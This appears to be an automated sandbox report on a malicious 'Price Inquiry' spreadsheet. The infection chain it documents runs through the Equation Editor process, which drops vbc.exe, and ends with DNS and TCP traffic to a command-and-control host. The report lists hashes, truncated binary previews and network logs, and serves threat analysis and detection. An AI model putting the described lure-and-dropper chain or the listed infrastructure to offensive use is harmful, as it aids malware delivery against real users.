                          SSDEEP:48:IkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5i:xwwwwwwwwwwk
                          MD5:4844627B02473990011804123A3C5083
                          SHA1:85D4CE236A4FEB8A89EB228E1C21149666DC550B
                          SHA-256:9AA0A74D50BA1FB347CEC6AF109EBD52EAE29D4158FF89CADF28A1834AF2A48E
                          SHA-512:0245561C10DA4CC217DE5CE86DB55D1D5559B79982817A4EFA870DDC3F5904FB657B16391D29D5BFB03B0C997CA7326B0D0E832E689726FC5392266BE91C89ED
                          Malicious:false
                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6..
                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          File Type:ISO-8859 text, with no line terminators
                          Category:dropped
                          Size (bytes):8
                          Entropy (8bit):2.75
                          Encrypted:false
                          SSDEEP:3:vs8t:vv
                          MD5:01FCE8516853E052EBF7CFE7D228F382
                          SHA1:6A29389E7E80090439216A97AD2827AC27BFD614
                          SHA-256:7E7CD5B082CDD1937A9E94F396AF653FA6BEB353942C8EA11DE2CD8452DB8DBC
                          SHA-512:0DE0365C8656B7A403F58E3BE48768C0F56E68B75FF0D7F1A820E6B04E9E81CA5793C3BF60E308FA96202E0C607AA720B8D58041F3F9DD00743381F14B0AF627
                          Malicious:true
                          Preview: gD..xx.H
                          C:\Users\user\AppData\Roaming\smsBuojZSZn.exe
                          Process:C:\Users\Public\vbc.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1044992
                          Entropy (8bit):7.850518378611463
                          Encrypted:false
                          SSDEEP:24576:F8oIlI5wVNEDoAzqMj+6zpTNyBCWIy5/fYd1xu1ZlIu:a2cNwzqMi6lTM0yI21Z1
                          MD5:AD2C14959341C7EC7D72C9FB3B10DEB9
                          SHA1:737ED1193D72E4C7CD48FBDFEDF9AB667ABE68CD
                          SHA-256:1EE33DB9BD5B99DA583572D6916630D858ED387EAB79C352F61EC070D2A600FA
                          SHA-512:35D0ABD365DA9A05A8B1B273FB936EFED92AFA03B7463F1E16901D053192B0EEE9F9BE71EB51516AF24A64F9F4E27EE20FFB55F30615EC8456CAEB8C682D7E20
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Aa.....................n........... ........@.. .......................`............@.................................0...W.......<k........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...<k.......l..................@..@................l.......H........I...V......H...................................................z.(......}.....(....o....}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s....z.2.{.....+...*....0..<........{......3..{....(....o....3...}......+..s.......{....}..
                          C:\Users\user\Desktop\~$F99 SEP-15 Price Inquiry.xlsx
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):330
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                          Malicious:true
                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          C:\Users\Public\vbc.exe
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1044992
                          Entropy (8bit):7.850518378611463
                          Encrypted:false
                          SSDEEP:24576:F8oIlI5wVNEDoAzqMj+6zpTNyBCWIy5/fYd1xu1ZlIu:a2cNwzqMi6lTM0yI21Z1
                          MD5:AD2C14959341C7EC7D72C9FB3B10DEB9
                          SHA1:737ED1193D72E4C7CD48FBDFEDF9AB667ABE68CD
                          SHA-256:1EE33DB9BD5B99DA583572D6916630D858ED387EAB79C352F61EC070D2A600FA
                          SHA-512:35D0ABD365DA9A05A8B1B273FB936EFED92AFA03B7463F1E16901D053192B0EEE9F9BE71EB51516AF24A64F9F4E27EE20FFB55F30615EC8456CAEB8C682D7E20
                          Malicious:true
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Aa.....................n........... ........@.. .......................`............@.................................0...W.......<k........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...<k.......l..................@..@................l.......H........I...V......H...................................................z.(......}.....(....o....}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s....z.2.{.....+...*....0..<........{......3..{....(....o....3...}......+..s.......{....}..

                          Static File Info

                          General

                          File type:CDFV2 Encrypted
                          Entropy (8bit):7.989202415040257
                          TrID:
                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                          File name:F99 SEP-15 Price Inquiry.xlsx
                          File size:620544
                          MD5:4128d571ef358c0a3f7f8395f1d0fbfb
                          SHA1:47754be43c4494c02c0bf981dd29c1a1e493bcc7
                          SHA256:a87afbfab3f21c608c233f86f127b31d318132f122f6d08f3065d255dbd1e2fd
                          SHA512:2b1be50d132d2a437901c95d7f474875e96474fdcd71015c9777e80b4b4cb6c629f0f396bd141b6259d46d0cf21ceee9600a2a152a36aed4145ba6d506ba93ac
                          SSDEEP:12288:YWrdGJhKyBWsKiSz2mtibB52U5mB7M+GEfVkGqJSqXSsYxwx/Get:PG/W5iSzttilYUGATEfmTSqXEK
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          File Icon

                          Icon Hash:e4e2aa8aa4b4bcb4

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          09/15/21-11:45:31.347027UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
                          09/15/21-11:45:31.375912UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
                          09/15/21-11:45:37.655745UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
                          09/15/21-11:45:50.042664UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                          09/15/21-11:45:50.071764UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                          09/15/21-11:45:56.268905UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591858.8.8.8192.168.2.22
                          09/15/21-11:46:02.431287UDP254DNS SPOOF query response with TTL of 1 min. and no authority53556168.8.8.8192.168.2.22
                          09/15/21-11:46:12.489511UDP254DNS SPOOF query response with TTL of 1 min. and no authority53517718.8.8.8192.168.2.22
                          09/15/21-11:46:40.593793UDP254DNS SPOOF query response with TTL of 1 min. and no authority53498948.8.8.8192.168.2.22
                          09/15/21-11:46:40.630979UDP254DNS SPOOF query response with TTL of 1 min. and no authority53498948.8.8.8192.168.2.22
                          09/15/21-11:46:51.383151UDP254DNS SPOOF query response with TTL of 1 min. and no authority53537458.8.8.8192.168.2.22
                          09/15/21-11:47:08.782804UDP254DNS SPOOF query response with TTL of 1 min. and no authority53550008.8.8.8192.168.2.22

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 15, 2021 11:45:21.252465963 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.413979053 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.414063931 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.414674044 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580662966 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580682993 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580699921 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580714941 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580725908 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580734015 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580749035 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580751896 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580753088 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580766916 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580769062 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580782890 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580785036 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580797911 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580797911 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580812931 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.580816031 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580830097 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.580842018 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.593523026 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741050959 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741081953 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741170883 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741214991 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741238117 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741260052 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741264105 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741280079 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741283894 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741292953 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741307974 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741317987 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741328955 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741349936 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741349936 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741380930 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741406918 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741411924 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741430044 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741451025 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741451979 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741461992 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741476059 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741485119 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741497993 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741508961 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741522074 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741532087 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741547108 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741555929 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741569042 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741581917 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741590023 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741611004 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741626024 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741628885 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741652966 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.741661072 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.741686106 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.743520975 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901647091 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901671886 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901689053 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901705027 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901720047 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901735067 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901809931 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901818991 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901827097 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901838064 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901843071 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901856899 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901858091 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901863098 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901874065 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901875019 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901889086 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901891947 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901905060 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901909113 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901923895 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901926041 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901940107 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901961088 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.901977062 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.901993036 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902008057 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902014017 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.902025938 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.902025938 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902043104 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902045965 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.902057886 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902060032 CEST4916780192.168.2.22207.246.99.155
                          Sep 15, 2021 11:45:21.902074099 CEST8049167207.246.99.155192.168.2.22
                          Sep 15, 2021 11:45:21.902076006 CEST4916780192.168.2.22207.246.99.155

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 15, 2021 11:45:31.317352057 CEST5216753192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:31.347027063 CEST53521678.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:31.348037004 CEST5216753192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:31.375911951 CEST53521678.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:37.625490904 CEST5059153192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:37.655745029 CEST53505918.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:43.820293903 CEST5780553192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:43.848176956 CEST53578058.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:49.989232063 CEST5903053192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:50.042664051 CEST53590308.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:50.043251991 CEST5903053192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:50.071763992 CEST53590308.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:56.233469963 CEST5918553192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:56.268904924 CEST53591858.8.8.8192.168.2.22
                          Sep 15, 2021 11:45:56.269764900 CEST5918553192.168.2.228.8.8.8
                          Sep 15, 2021 11:45:56.296979904 CEST53591858.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:02.402532101 CEST5561653192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:02.431287050 CEST53556168.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:07.593096018 CEST4997253192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:07.620585918 CEST53499728.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:12.461000919 CEST5177153192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:12.489511013 CEST53517718.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:17.566065073 CEST5986753192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:17.598403931 CEST53598678.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:17.602197886 CEST5986753192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:17.628771067 CEST53598678.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:23.625164986 CEST5031553192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:23.654736042 CEST53503158.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:28.811131001 CEST5007253192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:28.841183901 CEST53500728.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:34.898437023 CEST5430453192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:34.924940109 CEST53543048.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:40.560432911 CEST4989453192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:40.593792915 CEST53498948.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:40.594425917 CEST4989453192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:40.630979061 CEST53498948.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:46.680928946 CEST6464553192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:46.707566977 CEST53646458.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:51.351882935 CEST5374553192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:51.383151054 CEST53537458.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:56.098634958 CEST5435853192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:56.129673958 CEST53543588.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:56.130129099 CEST5435853192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:56.161386967 CEST53543588.8.8.8192.168.2.22
                          Sep 15, 2021 11:46:56.192749977 CEST6501753192.168.2.228.8.4.4
                          Sep 15, 2021 11:46:56.228226900 CEST53650178.8.4.4192.168.2.22
                          Sep 15, 2021 11:46:56.303338051 CEST5834153192.168.2.228.8.8.8
                          Sep 15, 2021 11:46:56.330483913 CEST53583418.8.8.8192.168.2.22
                          Sep 15, 2021 11:47:00.402194977 CEST5638353192.168.2.228.8.8.8
                          Sep 15, 2021 11:47:00.427081108 CEST53563838.8.8.8192.168.2.22
                          Sep 15, 2021 11:47:00.459393024 CEST6217253192.168.2.228.8.4.4
                          Sep 15, 2021 11:47:00.494774103 CEST53621728.8.4.4192.168.2.22
                          Sep 15, 2021 11:47:00.532062054 CEST6085953192.168.2.228.8.8.8
                          Sep 15, 2021 11:47:00.557017088 CEST53608598.8.8.8192.168.2.22
                          Sep 15, 2021 11:47:04.603688955 CEST5905553192.168.2.228.8.8.8
                          Sep 15, 2021 11:47:04.633001089 CEST53590558.8.8.8192.168.2.22
                          Sep 15, 2021 11:47:04.667922974 CEST6006453192.168.2.228.8.4.4
                          Sep 15, 2021 11:47:04.700632095 CEST53600648.8.4.4192.168.2.22
                          Sep 15, 2021 11:47:04.708947897 CEST5168953192.168.2.228.8.8.8
                          Sep 15, 2021 11:47:04.743802071 CEST53516898.8.8.8192.168.2.22
                          Sep 15, 2021 11:47:08.752850056 CEST5500053192.168.2.228.8.8.8
                          Sep 15, 2021 11:47:08.782804012 CEST53550008.8.8.8192.168.2.22

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Sep 15, 2021 11:45:31.317352057 CEST192.168.2.228.8.8.80xbf55Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:31.348037004 CEST192.168.2.228.8.8.80xbf55Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:37.625490904 CEST192.168.2.228.8.8.80x5878Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:43.820293903 CEST192.168.2.228.8.8.80x101eStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:49.989232063 CEST192.168.2.228.8.8.80x4feeStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:50.043251991 CEST192.168.2.228.8.8.80x4feeStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:56.233469963 CEST192.168.2.228.8.8.80x4831Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:56.269764900 CEST192.168.2.228.8.8.80x4831Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:02.402532101 CEST192.168.2.228.8.8.80x32beStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:07.593096018 CEST192.168.2.228.8.8.80x1d49Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:12.461000919 CEST192.168.2.228.8.8.80x95c0Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:17.566065073 CEST192.168.2.228.8.8.80xa9a1Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:17.602197886 CEST192.168.2.228.8.8.80xa9a1Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:23.625164986 CEST192.168.2.228.8.8.80xb26bStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:28.811131001 CEST192.168.2.228.8.8.80x85edStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:34.898437023 CEST192.168.2.228.8.8.80x9b56Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:40.560432911 CEST192.168.2.228.8.8.80x7ed9Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:40.594425917 CEST192.168.2.228.8.8.80x7ed9Standard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:46.680928946 CEST192.168.2.228.8.8.80x9c5dStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:51.351882935 CEST192.168.2.228.8.8.80x465dStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:56.098634958 CEST192.168.2.228.8.8.80xccc6Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:56.130129099 CEST192.168.2.228.8.8.80xccc6Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:56.192749977 CEST192.168.2.228.8.4.40x3778Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:56.303338051 CEST192.168.2.228.8.8.80x4b91Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:00.402194977 CEST192.168.2.228.8.8.80xebb2Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:00.459393024 CEST192.168.2.228.8.4.40x9e17Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:00.532062054 CEST192.168.2.228.8.8.80x6d32Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:04.603688955 CEST192.168.2.228.8.8.80xe23bStandard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:04.667922974 CEST192.168.2.228.8.4.40x87e6Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:04.708947897 CEST192.168.2.228.8.8.80xe5c5Standard query (0)newmeforever12.3utilities.comA (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:08.752850056 CEST192.168.2.228.8.8.80xcddfStandard query (0)newmeforever.3utilities.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Sep 15, 2021 11:45:31.347027063 CEST8.8.8.8192.168.2.220xbf55No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:31.375911951 CEST8.8.8.8192.168.2.220xbf55No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:37.655745029 CEST8.8.8.8192.168.2.220x5878No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:43.848176956 CEST8.8.8.8192.168.2.220x101eNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:50.042664051 CEST8.8.8.8192.168.2.220x4feeNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:50.071763992 CEST8.8.8.8192.168.2.220x4feeNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:56.268904924 CEST8.8.8.8192.168.2.220x4831No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:45:56.296979904 CEST8.8.8.8192.168.2.220x4831No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:02.431287050 CEST8.8.8.8192.168.2.220x32beNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:07.620585918 CEST8.8.8.8192.168.2.220x1d49No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
